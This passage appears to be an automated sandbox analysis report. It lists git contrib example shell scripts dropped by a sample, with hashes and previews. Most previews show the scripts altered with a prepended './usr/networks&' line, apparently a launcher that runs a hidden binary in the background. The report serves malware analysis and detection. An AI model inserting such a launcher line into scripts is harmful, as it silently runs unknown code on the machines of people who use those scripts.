                                                                                                                            Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                                            /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):61
                                                                                                                            Entropy (8bit):4.0161977906092705
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                                            MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                                            SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                                            SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                                            SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):234
                                                                                                                            Entropy (8bit):4.9965164312586925
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                                            MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                                            SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                                            SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                                            SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2436
                                                                                                                            Entropy (8bit):5.153713997451705
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                                            MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                                            SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                                            SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                                            SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                                            /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):247
                                                                                                                            Entropy (8bit):4.532049748049262
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                                            MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                                            SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                                            SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                                            SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12742
                                                                                                                            Entropy (8bit):5.053935136942481
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                                            MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                                            SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                                            SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                                            SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                                            /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4349
                                                                                                                            Entropy (8bit):4.9994650554848405
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                                            MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                                            SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                                            SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                                            SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                                            /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2499
                                                                                                                            Entropy (8bit):5.168731776130111
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                                            MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                                            SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                                            SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                                            SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                                            /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1947
                                                                                                                            Entropy (8bit):5.193786239756587
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                                            MD5:F1EDF5EE98492845561257661376A072
                                                                                                                            SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                                            SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                                            SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                                            /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2433
                                                                                                                            Entropy (8bit):5.07831529192731
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                                            MD5:71B42464943116BC0925788790C82720
                                                                                                                            SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                                            SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                                            SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                                            /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4385
                                                                                                                            Entropy (8bit):5.300590299626365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                                            MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                                            SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                                            SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                                            SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                                            /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1972
                                                                                                                            Entropy (8bit):5.222096129300364
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                                            MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                                            SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                                            SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
                                                                                                                            SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                                            /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):243
                                                                                                                            Entropy (8bit):5.091025781115778
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                                            MD5:BE780CC322587122E892D123BFF726B6
                                                                                                                            SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                                            SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                                            SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):792
                                                                                                                            Entropy (8bit):4.925184193549972
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                                            MD5:895868AC151D9953AD152F77240CF73D
                                                                                                                            SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                                            SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                                            SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):486
                                                                                                                            Entropy (8bit):5.198694046664742
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                                            MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                                            SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                                            SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                                            SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2904
                                                                                                                            Entropy (8bit):5.006955417229927
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                                            MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                                            SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                                            SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                                            SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                                            /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):637
                                                                                                                            Entropy (8bit):4.973192610623575
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                                            MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                                            SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                                            SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                                            SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                                            Malicious:false
